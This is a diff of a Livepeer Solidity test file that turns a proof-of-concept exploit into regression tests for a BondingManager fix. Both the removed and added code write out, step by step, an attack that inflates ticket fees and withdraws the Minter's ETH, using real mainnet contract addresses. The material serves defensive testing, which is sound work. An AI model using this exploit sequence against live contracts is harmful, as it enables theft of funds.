livepeer
diff --git a/‎src/test/BondingManagerInflatedTicketFix.sol‎
Lines changed: 120 additions & 51 deletions b/‎src/test/BondingManagerInflatedTicketFix.sol‎
Lines changed: 120 additions & 51 deletions
@@ -10,15 +10,16 @@ import "contracts/token/LivepeerToken.sol";
 
 // forge test --match-contract BondingManagerInflatedTicketFix --fork-url https://arbitrum-mainnet.infura.io/v3/$INFURA_KEY -vvv --fork-block-number 267164264
 contract BondingManagerInflatedTicketFix is GovernorBaseTest {
-    LivepeerToken lpt = LivepeerToken(0x289ba1701C2F088cf0faf8B3705246331cB8A839);
-    BondingManager bm = BondingManager(0x35Bcf3c30594191d53231E4FF333E8A770453e40);
-    TicketBroker tb = TicketBroker(0xa8bB618B1520E284046F3dFc448851A1Ff26e41B);
-    RoundsManager rm = RoundsManager(0xdd6f56DcC28D3F5f27084381fE8Df634985cc39f);
+    LivepeerToken public constant TOKEN = LivepeerToken(0x289ba1701C2F088cf0faf8B3705246331cB8A839);
+    BondingManager public constant BONDING_MANAGER = BondingManager(0x35Bcf3c30594191d53231E4FF333E8A770453e40);
+    TicketBroker public constant TICKET_BROKER = TicketBroker(0xa8bB618B1520E284046F3dFc448851A1Ff26e41B);
+    RoundsManager public constant ROUNDS_MANAGER = RoundsManager(0xdd6f56DcC28D3F5f27084381fE8Df634985cc39f);
 
-    address constant MINTER = 0xc20DE37170B45774e6CD3d2304017fc962f27252;
+    address public constant MINTER = 0xc20DE37170B45774e6CD3d2304017fc962f27252;
 
-    address TICKET_SENDER;
-    uint256 TICKET_SENDER_KEY = 31337;
+    uint256 public constant TICKET_SENDER_KEY = 31337;
+
+    address ticketSender;
 
     bytes32 public constant BONDING_MANAGER_TARGET_ID = keccak256("BondingManagerTarget");
     BondingManager public newBondingManagerTarget;
@@ -39,52 +40,131 @@ contract BondingManagerInflatedTicketFix is GovernorBaseTest {
             )
         );
 
-        // Fund the attacker with 4010 LPT to main contract
+        ticketSender = CHEATS.addr(TICKET_SENDER_KEY);
+
+        // Fund the attacker with 8010 LPT to main contract
         CHEATS.prank(MINTER);
-        lpt.transfer(address(this), 4010 ether);
+        TOKEN.transfer(address(this), 8010 ether);
         // which in turn funds the second contract with 10 LPT
-        lpt.transfer(address(0x1337), 10 ether);
+        TOKEN.transfer(ticketSender, 10 ether);
+
+        TOKEN.approve(address(BONDING_MANAGER), type(uint256).max);
 
-        TICKET_SENDER = CHEATS.addr(TICKET_SENDER_KEY);
+        CHEATS.prank(ticketSender);
+        TOKEN.approve(address(BONDING_MANAGER), type(uint256).max);
+
+        // Ticket sender needs to deposit the assets (they'll be stolen back later)
+        payable(ticketSender).transfer(1 ether);
+        CHEATS.prank(ticketSender);
+        TICKET_BROKER.fundDeposit{ value: 1 ether }();
     }
 
-    function test_poc() public {
-        // Check start balance
-        console.log("Start minter balance:", MINTER.balance, "wei");
+    function test_inflatedTicketForInactiveTranscoder() public {
+        uint256 startMinterBalance = MINTER.balance;
 
         // Bond 4000 LPT from the attacker, enough to become an active transcoder in the forked block
-        lpt.approve(address(bm), type(uint256).max);
-        bm.bond(4000 ether, address(this));
-        // Set reward and fee cut rate such that the transcoder gets all rewards but delegators get all fees
-        bm.transcoder(1e6, 1e6);
+        BONDING_MANAGER.bond(4000 ether, address(this));
+        BONDING_MANAGER.transcoder(1e6, 1e6);
 
-        // Wait for the next round
-        _nextRound();
+        nextRound();
 
         // Unbond all LPT except 1 wei, such that the transcoder becomes the last active transcoder wth 1 wei stake.
-        bm.unbond(4000 ether - 1 wei);
+        BONDING_MANAGER.unbond(4000 ether - 1 wei);
 
         // Secondary attacker contract now bonds with the 10 LPT, kicking the main contract out of the active transcoders
-        CHEATS.startPrank(address(0x1337));
-        lpt.approve(address(bm), type(uint256).max);
-        bm.bond(10 ether, address(0x1337));
-        CHEATS.stopPrank();
+        CHEATS.prank(ticketSender);
+        BONDING_MANAGER.bond(10 ether, ticketSender);
 
         // Main attacker now calls reward in the last active round, which will increase the activeCumulativeRewards but not the total stake of the next round (because they're not active anymore)
-        bm.reward();
+        BONDING_MANAGER.reward();
+
+        nextRound();
+
+        // Now redeeming the ticket will give 1 ETH in fees to the main attacker
+        (MTicketBrokerCore.Ticket memory ticket, bytes memory signature, uint256 rand) = signWinningTicket();
+        TICKET_BROKER.redeemWinningTicket(ticket, signature, rand);
+
+        // Convert to actual fees
+        BONDING_MANAGER.claimEarnings(0);
+        uint256 claimedFees = 1 ether - 1; // there's a rounding error on cumulative rewards calc
+
+        // Try to withdraw the entire Minter's ETH balance and expect it to fail
+        CHEATS.expectRevert("insufficient fees to withdraw");
+        BONDING_MANAGER.withdrawFees(payable(address(this)), MINTER.balance);
+        assertEq(MINTER.balance, startMinterBalance);
+
+        // Successfully withdraw only the 1 ETH in fees
+        BONDING_MANAGER.withdrawFees(payable(address(this)), claimedFees);
+        assertEq(MINTER.balance, startMinterBalance - claimedFees);
+    }
+
+    function test_invalidTicketForUnbondedTranscoder() public {
+        // Bond 4000 LPT from the attacker, enough to become an active transcoder in the forked block
+        BONDING_MANAGER.bond(4000 ether, address(this));
+        BONDING_MANAGER.transcoder(1e6, 1e6);
+
+        nextRound();
+
+        // Unbond all LPT except such that the transcoder stops being a registered transcoder
+        BONDING_MANAGER.unbond(4000 ether);
 
-        // Wait for the next round
-        _nextRound();
+        // Main attacker now calls reward in the last active round, which will increase the activeCumulativeRewards but not the total stake of the next round (because they're not registered anymore)
+        BONDING_MANAGER.reward();
+        assertTrue(!BONDING_MANAGER.isRegisteredTranscoder(address(this)));
 
+        nextRound();
+
+        // Bond back the LPT to become a registered transcoder again
+        BONDING_MANAGER.bond(4000 ether, address(this));
+
+        (uint256 lastRewardRound, , , uint256 lastActiveStakeUpdateRound, , , , , , ) = BONDING_MANAGER.getTranscoder(
+            address(this)
+        );
+        uint256 currentRound = ROUNDS_MANAGER.currentRound();
+        assertEq(lastRewardRound, currentRound - 1); // reward called in the previous round
+        assertEq(lastActiveStakeUpdateRound, currentRound + 1); // stake updated in the current round
+
+        (uint256 lastActiveRoundTotalStake, , , , ) = BONDING_MANAGER.getTranscoderEarningsPoolForRound(
+            address(this),
+            lastActiveStakeUpdateRound
+        );
+        assertGe(lastActiveRoundTotalStake, 4000 ether);
+        (uint256 currentRoundTotalStake, , , , ) = BONDING_MANAGER.getTranscoderEarningsPoolForRound(
+            address(this),
+            currentRound
+        );
+        assertGe(currentRoundTotalStake, 0); // will not be 0 on current round due to rewards from previous round
+        assertLt(currentRoundTotalStake, 4000 ether); // still lower than the 4000 ether that were just bonded
+
+        // Now redeeming the ticket will revert because a division by a 0 totalStake on the currentRound.
+        // lastActiveStakeUpdateRound > currentRound due to the bond above, so it can't be used
+        (MTicketBrokerCore.Ticket memory ticket, bytes memory signature, uint256 rand) = signWinningTicket();
+        TICKET_BROKER.redeemWinningTicket(ticket, signature, rand);
+
+        (, , , , , , , , uint256 cumulativeFees, ) = BONDING_MANAGER.getTranscoder(address(this));
+        assertEq(cumulativeFees, 1 ether);
+    }
+
+    function signWinningTicket()
+        public
+        returns (
+            MTicketBrokerCore.Ticket memory ticket,
+            bytes memory sig,
+            uint256 rand
+        )
+    {
         // Prepare a always-winning ticket of 1 ETH to the main attacker contract
-        MTicketBrokerCore.Ticket memory ticket = MTicketBrokerCore.Ticket({
+        ticket = MTicketBrokerCore.Ticket({
             recipient: address(this),
-            sender: TICKET_SENDER,
+            sender: ticketSender,
             faceValue: 1 ether,
             winProb: type(uint256).max,
             senderNonce: 1,
             recipientRandHash: keccak256(abi.encodePacked(uint256(1337))),
-            auxData: abi.encodePacked(rm.currentRound(), rm.blockHashForRound(rm.currentRound()))
+            auxData: abi.encodePacked(
+                ROUNDS_MANAGER.currentRound(),
+                ROUNDS_MANAGER.blockHashForRound(ROUNDS_MANAGER.currentRound())
+            )
         });
 
         // Sign it
@@ -102,30 +182,19 @@ contract BondingManagerInflatedTicketFix is GovernorBaseTest {
         bytes32 signHash = keccak256(abi.encodePacked("\x19Ethereum Signed Message:\n32", ticketHash));
         (uint8 v, bytes32 r, bytes32 s) = CHEATS.sign(TICKET_SENDER_KEY, signHash);
 
-        // Ticket sender needs to deposit the assets (they'll be stolen back later)
-        payable(TICKET_SENDER).transfer(1 ether);
-        CHEATS.prank(TICKET_SENDER);
-        tb.fundDeposit{ value: 1 ether }();
-
-        // Now redeeming the ticket will give 1 ETH in fees to the main attacker
-        // which will be multiplied with a huge multiplier due to the stake being 1 wei and the
-        // activeCumulativeRewards being much higher.
-        tb.redeemWinningTicket(ticket, abi.encodePacked(r, s, v), 1337);
+        return (ticket, abi.encodePacked(r, s, v), 1337);
+    }
 
-        // Convert to actual fees
-        bm.claimEarnings(0);
+    function nextRound() public {
+        console.log("Current round (before roll): ", ROUNDS_MANAGER.currentRound());
 
-        (, uint256 fees, , , , , ) = bm.getDelegator(address(this));
-        // And withdraw the accrued fees
-        bm.withdrawFees(payable(address(this)), fees);
+        uint256 currentRoundStartBlock = ROUNDS_MANAGER.currentRoundStartBlock();
+        uint256 roundLength = ROUNDS_MANAGER.roundLength();
+        CHEATS.roll(currentRoundStartBlock + roundLength);
 
-        // gg wp
-        console.log("Final minter balance:", MINTER.balance, "wei");
-    }
+        ROUNDS_MANAGER.initializeRound();
 
-    function _nextRound() private {
-        CHEATS.roll(block.number + 6377);
-        rm.initializeRound();
+        console.log("Current round (after roll): ", ROUNDS_MANAGER.currentRound());
     }
 
     receive() external payable {}